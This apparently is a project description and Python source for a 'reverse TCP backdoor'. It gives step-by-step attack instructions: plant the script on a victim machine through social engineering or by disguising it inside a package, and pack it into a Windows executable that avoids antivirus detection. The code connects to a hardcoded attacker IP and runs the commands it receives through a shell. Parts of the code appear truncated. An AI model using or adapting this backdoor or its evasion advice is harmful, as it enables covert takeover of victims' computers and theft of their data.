Reverse TCP Shell is A simple reverse tcp backdoor.
Two files are provided :
— malicious python code, run it on victim side.
— can be packed into “exe” file using pyinstaller and run on Windows with no antivirus software detected (tested on Windows8.1, not detected)
On windows, run pyinstaller –noconsole –onefile reverse_tcp.py to pack the malicious reverse_tcp.py to Windows executable file.
How to attack :
+ On attacker side, execute node listener.js to run the listener file on attacker’s machine.
+ Plant and execute reverse_tcp.py on victim machine. (SE, camouflage py file as part of package, etc)
Why implementing Reverse TCP attack in Python
We first tried metasploit and used the windows/shell_reverse_tcp payload to generate the malicious exe file and we also tried msfencode to encode the exe file. However, no matter how we encoded the malicious exe file, Windows Defender could always detect it(It is interesting to find out that some 3rd party av couldn’t detect our trojan). After doing some research, we find out that Windows Defender will always load the program to memory first then scan it, so encoding will never work.
### Use python 2
### let victim run this file
### To convert this file to windows exe, use "pyinstaller" and run "pyinstaller --noconsole --onefile reverse_tcp.py"
import socket, subprocess, os
attacker_ip = "22.214.171.124" ## attacker's ip, change this ip address if necessary.
attacker_port = 6667 ## attacker's port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ## connect to attacker's machine
command = s.recv(1024) # receive attacker's remote command
if command == "exit": # quit shell
if len(command) > 3 and command[0: 3] == "cd ": # change directory
# run command
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = proc.stdout.read() + proc.stderr.read()
if len(output) == 0:
output = " "